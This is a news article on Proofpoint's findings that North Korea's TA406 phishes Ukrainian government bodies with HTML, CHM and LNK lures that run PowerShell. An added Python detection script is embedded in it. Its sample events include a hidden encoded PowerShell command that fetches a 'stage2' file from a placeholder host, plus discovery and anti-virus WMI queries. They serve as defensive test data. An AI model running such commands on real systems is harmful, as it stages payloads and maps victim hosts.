
North Korean state-sponsored hackers launched attacks against government entities and other organisations in Ukraine. It looks like the rogue state wants to determine if Russia will request more troops or armaments in an ongoing war.
North Korea has been running phishing campaigns aimed at credential harvesting and malware delivery. Contrary to the Russian cyberwarfare activities that are oriented at getting tactical battlefield information or causing disruption, North Korean hackers focus on gathering strategic intelligence.
They’re interested in Ukraine’s political and military situation to support the rogue state’s decision-making regarding military commitments to Russia.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments,” Proofpoint said in a report.
The security firm labels the threat actor TA406, but it is also known as Opal Sleet or Konni. Its activities previously overlapped with Kimsuky and Thallium. Proofpoint has been tracking cyberattacks against Ukraine by these hackers since February 2025.
Rely on impersonation and phishing
The hackers from the Democratic People's Republic of Korea (DPRK) impersonate members of fictitious think tanks and send phishing emails, luring targets with politically relevant content, based heavily on recent events.
The phishing emails carry attached HTML and CHM (Microsoft Compiled HTML Help) files with embedded malicious PowerShell scripts that deploy malware. To evade detection, the attackers pack these files into a password-protected RAR archive.
One phishing example, observed by Proofpoint, included a fictitious senior fellow at a non-existent think tank called the Royal Institute of Strategic Studies. The lure was related to former Ukrainian military leader Valeriy Zaluzhnyi.
If a user opens the malicious HTML file, it runs a PowerShell script that downloads and executes additional packages.
“The next stage PowerShell file executes several commands to gather information about the victim host. These include ipconfig /all, systeminfo, as well as commands to grab recent file names and disk information and commands to use WMI to gather information about any anti-virus tools installed on the host,” the report explains.
TA406 has also been observed attempting to gather credentials by sending fake Microsoft security alert messages from Proton Mail accounts, or delivering ZIP archives with benign PDFs as well as malicious LNK files that execute Base64-encoded PowerShell.
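The two behaviours quoted above (a PowerShell stage spawning `ipconfig /all`, `systeminfo` and a WMI anti-virus query, and LNK files launching Base64-encoded PowerShell) are easy to spot in process-creation telemetry once you know the chain. The following is an added detection example, not Proofpoint's code or anything from the report: it runs over constructed Sysmon-style process-creation events, groups discovery commands by parent PID, and decodes `-EncodedCommand` payloads so an analyst sees the script. The field names, the `SecurityCenter2`/`AntiVirusProduct` form of the WMI query (the report only says "WMI"), and `explorer.exe` as the parent of an LNK-launched PowerShell are assumptions.

```python
"""Added detection example for the TA406 host-discovery chain and encoded
PowerShell described in the article. Not Proofpoint's code; all events below
are constructed, Sysmon Event ID 1 style records."""
import base64
import re
from collections import defaultdict

# Discovery commands named in the report, as regexes over the command line.
DISCOVERY_PATTERNS = {
    "ipconfig_all": re.compile(r"\bipconfig(\.exe)?\s+/all\b", re.I),
    "systeminfo": re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
    # WMI query for installed anti-virus products. The report only says "WMI";
    # the SecurityCenter2 / AntiVirusProduct form is an assumption.
    "wmi_av_query": re.compile(r"securitycenter2.*antivirusproduct", re.I | re.S),
}
POWERSHELL = re.compile(r"(powershell|pwsh)\.exe$", re.I)
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script of an encoded-command argument, or None.
    PowerShell expects the Base64 payload to be UTF-16LE text."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_discovery_chains(events, min_hits=2):
    """Group child processes by parent PID and report PowerShell parents that
    ran at least `min_hits` distinct discovery commands from the report."""
    hits = defaultdict(set)
    parent_image = {}
    for ev in events:
        parent_image[ev["ParentProcessId"]] = ev["ParentImage"]
        for name, pat in DISCOVERY_PATTERNS.items():
            if pat.search(ev["CommandLine"]):
                hits[ev["ParentProcessId"]].add(name)
    alerts = []
    for ppid, names in hits.items():
        if POWERSHELL.search(parent_image[ppid]) and len(names) >= min_hits:
            alerts.append({"parent_pid": ppid, "indicators": sorted(names)})
    return alerts


def find_encoded_powershell(events):
    """Flag PowerShell started with an encoded command and attach the decoded
    script. A parent of explorer.exe is what a user double-clicking an LNK
    looks like (assumed; the report does not name the parent process)."""
    alerts = []
    for ev in events:
        if not POWERSHELL.search(ev["Image"]):
            continue
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is not None:
            alerts.append({"pid": ev["ProcessId"], "parent": ev["ParentImage"],
                           "decoded": decoded})
    return alerts


# Constructed sample data. The encoded script is benign and points at a
# reserved .invalid hostname; it is built here so the Base64 is exact.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_SCRIPT = ("Invoke-WebRequest -Uri 'http://example.invalid/stage2' "
                 r"-OutFile $env:TEMP\s.ps1")
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # LNK-style launch: explorer.exe -> powershell.exe -enc <Base64>
    {"ProcessId": 4010, "ParentProcessId": 3002, "Image": PS_PATH,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"},
    # Host-discovery children of that PowerShell process
    {"ProcessId": 4011, "ParentProcessId": 4010, "Image": r"C:\Windows\System32\ipconfig.exe",
     "ParentImage": PS_PATH, "CommandLine": "ipconfig /all"},
    {"ProcessId": 4012, "ParentProcessId": 4010, "Image": r"C:\Windows\System32\systeminfo.exe",
     "ParentImage": PS_PATH, "CommandLine": "systeminfo"},
    {"ProcessId": 4013, "ParentProcessId": 4010, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": PS_PATH,
     "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    # Benign noise: an administrator running ipconfig from a cmd.exe prompt
    {"ProcessId": 5001, "ParentProcessId": 5000, "Image": r"C:\Windows\System32\ipconfig.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "ipconfig /all"},
]

if __name__ == "__main__":
    for alert in find_discovery_chains(SAMPLE_EVENTS):
        print("discovery chain:", alert)
    for alert in find_encoded_powershell(SAMPLE_EVENTS):
        print("encoded PowerShell:", alert)
```

Requiring two or more distinct discovery commands under one PowerShell parent keeps a lone `ipconfig /all` from an administrator's shell out of the alert list, while the decoded script gives the analyst the next-stage URL to block and hunt for without running anything.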
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” the researchers conclude.